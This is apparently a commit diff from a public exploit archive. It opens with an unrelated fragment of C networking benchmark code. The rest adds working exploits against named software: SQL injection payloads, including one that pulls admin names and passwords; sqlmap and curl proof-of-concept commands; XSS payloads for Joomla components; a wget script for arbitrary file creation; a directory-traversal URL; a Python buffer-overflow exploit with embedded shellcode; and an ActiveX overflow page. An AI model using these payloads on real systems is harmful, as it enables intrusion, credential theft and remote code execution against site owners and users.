static void *thread (void *data)
{
unsigned n = (uintptr_t)data;
struct sockaddr_in6 dst;
uint16_t tunhead[2];
int fd = socket (PF_INET6, SOCK_DGRAM, 0);
pthread_cleanup_push (cleanup_fd, (void *)(intptr_t)fd);
memset (&dst, 0, sizeof (dst));
dst.sin6_family = AF_INET6;
dst.sin6_addr.s6_addr32[0] = htonl (0xfd345678);
dst.sin6_addr.s6_addr32[1] = htonl (0x9ABCDEF0);
dst.sin6_addr.s6_addr32[2] = htonl (0);
dst.sin6_port = htons (53);
__sync_fetch_and_and (&rcvd, 0);
for (;;)
{
dst.sin6_addr.s6_addr32[3] =
__sync_fetch_and_add (&rcvd, 1) % n;
sendto (fd, NULL, 0, 0,
(struct sockaddr *)&dst, sizeof (dst));
read (tun, tunhead, 4);
}
pthread_cleanup_pop (0);
}
int main (void)
{
setvbuf (stdout, NULL, _IONBF, 0);
tun = tun_open ();
if (tun == -1)
{
perror ("Error");
return 1;
}
for (uintptr_t n = 1; n <= (1 << 20); n *= 2)
{
struct timespec ts = { 1, 0, };
pthread_t th;
printf ("%6ju: ", (uintmax_t)n);
pthread_create (&th, NULL, thread, (void *)n);
clock_nanosleep (CLOCK_MONOTONIC, 0, &ts, NULL);
pthread_cancel (th);
pthread_join (th, NULL);
__sync_synchronize ();
printf ("%12u\n", rcvd);
}
close (tun);
return 0;
}

204
platforms/php/webapps/33626.txt Executable file
View file

@ -0,0 +1,204 @@
# Exploit Title: PHPBTTracker+ 2.2 SQL Injection
# Date: May 13th, 2014
# Exploit Author: BackBox Team <info@backbox.org>
# Vendor Homepage: http://phpbttrkplus.sourceforge.net/
# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/
# Version: PHPBTTracker+ 2.2
# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0
========================================================================
Advisory: PHPBTTracker+ 2.2 SQL Injection
Disclosure by: BackBox Team <info@backbox.org>
Severity: High
I. INTRODUCTION
========================================================================
SQL Injection through User-Agent.
User agent is an HTTP header section provided by application used by the
original client. This is used for statistical purposes and the protocol
violation tracing. The first white space delimited word must include the
product name with an optional slash and version number.
User agent injection is a critical issue for web applications. In this
specific case its worthed to do an investigation on the header section
of user-agent to see if there is any malformation that will allow an SQLi.
Example:
GET /tracker.php
User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa
Host: [host]
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity
II. BACKGROUND
========================================================================
BitTorrent tracker protocol is used by clients to request the IP
addresses of other peers associated with a torrent, and to exchange the
client's transfer statistics. Clients connect to a centralized server,
known as a *tracker*, which stores their IP addresses and responds with
the IP addresses of other clients (also known as *peers*). The tracker
has no knowledge about the association of the nodes and their pieces
(it functions only as bridge between clients).
The standard tracker protocol is based on HTTP, with request data
encoded as query parameters (as used by HTML forms) and response data
BEncoded.
Query parameters must be encoded according to the rules for HTML form
submissions through HTTP GET: 'reserved character' bytes are encoded in
hexadecimal as %HH, and space is encoded as "+"; names and values are
joined with "=" and the pairs joined with "&".
The tracker's URL announce is obtained from the announce entry of the
root dictionary of the torrent metadata file.
Clients announce themselves by sending a GET request to the tracker's
URL announce with "?" and the following parameters (encoded as above)
appended:
info_hash
The 20 byte sha1 hash of the bencoded form of the info value from
the metainfo file. Note that this is a substring of the metainfo
file. Don't forget to URL-encode this.
peer_id
A string of length 20 which the downloader uses as its id. Each
downloader generates its own id at random at the start of a new
download. Don't forget to URL-encode this.
port
Port number that the peer is listening on. Common behavior is for a
downloader to try to listen on port 6881 and if that port is taken
try 6882, then 6883, etc. and give up after 6889.
uploaded
Total amount uploaded so far, represented in base ten in ASCII.
downloaded
Total amount downloaded so far, represented in base ten in ASCII.
left
Number of bytes that a specific client still has to download,
represented in base ten in ASCII. Note that this can't be computed
from downloaded and the file length since the client might be
resuming an earlier download, and there is a chance that some of
the downloaded data failed an integrity check and had to be
re-downloaded.
event
Optional key which maps to started, completed, or stopped (or empty,
which is the same as not being present). If not present, this is one
of the announcements done at regular intervals. An announcement
using started is sent when a download first begins, and one using
completed is sent when the download is complete. No completed is
sent if the file was complete when started. Downloaders should send
an announcement using 'stopped' when they cease downloading,
if they can.
Example:
http://hostname/announce
?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4
&peer_id=
&port=51413
&uploaded=0
&downloaded=0
&left=0
&event=started
III. DESCRIPTION
========================================================================
In order to exploit the vulnerability the torrent has to be managed by
the tracker. First we need to extract the GET request, and parse out the
parameter "info_hash", a proxy or a traffic sniffer like Wireshark can
help us to do that.
Example:
GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1
User-Agent: Transmission/2.51
Host: hostname
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity
Then it's possible to inject SQL commands inside the User-Agent field.
IV. PROOF OF CONCEPT
========================================================================
Is it possible to verify the vulnerability by using, for example,
sqlmap or curl...
* Using SQLMap
raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent
[...]
User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:
---
Place: User-Agent
Parameter: User-Agent
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW
---
* Using curl
raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'
[...]
d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e
V. BUSINESS IMPACT
========================================================================
An attacker could execute arbitrary SQL queries on the vulnerable
system. This may compromise the integrity of database and/or expose
sensitive information.
VI. SYSTEMS AFFECTED
========================================================================
PHPBTTracker+ Version 2.2 is vulnerable (probably v2.x and
RivetTracker v1.x too)
Software Link: http://phpbttrkplus.sourceforge.net/
Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0
VII. REFERENCES
========================================================================
https://wiki.theory.org/BitTorrent_Tracker_Protocol
http://resources.infosecinstitute.com/sql-injection-http-headers
VIII. CREDITS
========================================================================
The vulnerability has been discovered by BackBox Linux Team
http://www.backbox.org
IX. VULNERABILITY HISTORY
========================================================================
May 13th, 2014: Vulnerability identification
May ??th, 2014: Vendor notification
May ??th, 2014: Vulnerability disclosure
X. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse
of this information.

7
platforms/php/webapps/33634.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38184/info
CommodityRentals CD Rental Software is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0Ã?3a,admin_password),3,4+from+rental_adminâ??

28
platforms/php/webapps/33636.sh Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/38186/info
Interspire Knowledge Manager is prone to a vulnerability that allows attackers to create arbitrary files on a vulnerable computer.
An attacker may exploit this issue to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
Knowledge Manager 5.1.3 is vulnerable; other versions may also be affected.
# #!/bin/sh
# echo "$0 <target_url> <relative_path_from_admin_dir> <file_name>
<content_url>
# example: $0 http://target.com/knowledge_base ../../../ file.php
http://source
# if kb is installed at knowledge_base, then the file: file.php will be
# created in the base application directory from the content at
http://source
# "
# sessionUrl=$1'/admin/de/dialog/file_manager.php'
# uploadUrl=$1'/admin/de/dialog/callback.snipshot.php'
# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies
"$sessionUrl?userdocroot=$2&imgDir=&obj=1"
# echo "session created, setting file name $2$3"
# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step1&source_image=name&save_file_as=$3"
# echo "upload content from: $4 ..."
# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"
# echo "file created test access to the script at: $1/admin/de/dialog/$2$3";

11
platforms/php/webapps/33637.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38204/info
The Joomla! Webee component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected by the SQL-injection issue and possibly the HTML-injection issues as well.
http://www.example.com/index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --

13
platforms/php/webapps/33638.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38204/info
The Joomla! Webee component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected by the SQL-injection issue and possibly the HTML-injection issues as well.
[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]

16
platforms/php/webapps/33639.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/38209/info
Joomla! EasyBook component is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
EasyBook 2.0.0rc4 is vulnerable; other versions may also be affected.
The following example input is available:
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;
' onclick="alert('XSS')"
" onclick="alert('xss')"

13
platforms/php/webapps/33641.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38220/info
The Joomla! F!BB component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
F!BB 1.96 is vulnerable; other versions may also be affected.
The following proof-of-concept URI and data are available:
http://www.example.com/index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 --

12
platforms/php/webapps/33643.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38234/info
CMS Made Simple is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
CMS Made Simple 1.6.6 is affected; other versions may also be vulnerable.
http://www.example.com/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39

53
platforms/windows/dos/33640.py Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/38215/info
AIMP is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
AIMP 2.51 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#
# AIMP2 (aimp2c.exe) m3u malformed open file stack overflow exploit
# Coded by : Molotov
#
# Greats To : Corelanc0d3r & exploit-db
#
# thanks to : Simo36 & all friends
#
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX"
"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7"
"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP"
"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4"
"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K"
"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM"
"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU"
"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA"
)
header = "[playlist]\nNumberOfEntries=3\n\n"
header += ("File1=");
crash = 'A' * 2222
crash+= shellcode
crash+= 'B' * (4014-len(shellcode)-2222)
crash+= '\x41\x6d'
crash+= '\x0e\x45'
align = '\x58\x6d'
align+= '\x58\x6d'
align+= '\x58\x6d'
align+= '\x58\x6d'
align+= '\x05\x01\x11\x6d'
align+= '\x2d\x0F\x11\x6d'
align+= '\x50\x6d\xC3'
padd = 'D' * 3000
padd= 'D'*3000#n7Cn
buffer = header + crash +align+padd +'\n'
file=open('ss.m3u','w')
file.write(buffer)
file.close()
print "[+] ss.m3u file created successfully"

6
platforms/windows/remote/20815.pl
View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/2674/info
#source: http://www.securityfocus.com/bid/2674/info
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
#Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
#* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
#!/usr/bin/perl
# Exploit By storm@stormdev.net

13
platforms/windows/remote/33642.html Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38222/info
The Symantec Client Proxy ActiveX control is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
The following are vulnerable:
Symantec AntiVirus 10.0.x and 10.1.x prior to 10.1 MR9
Symantec AntiVirus 10.2.x prior to 10.2 MR4
Symantec Client Security 3.0.x and 3.1.x prior to 3.1 MR9
<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'> arg1=String(7188, "A") target.SetRemoteComputerName arg1 </script> </html>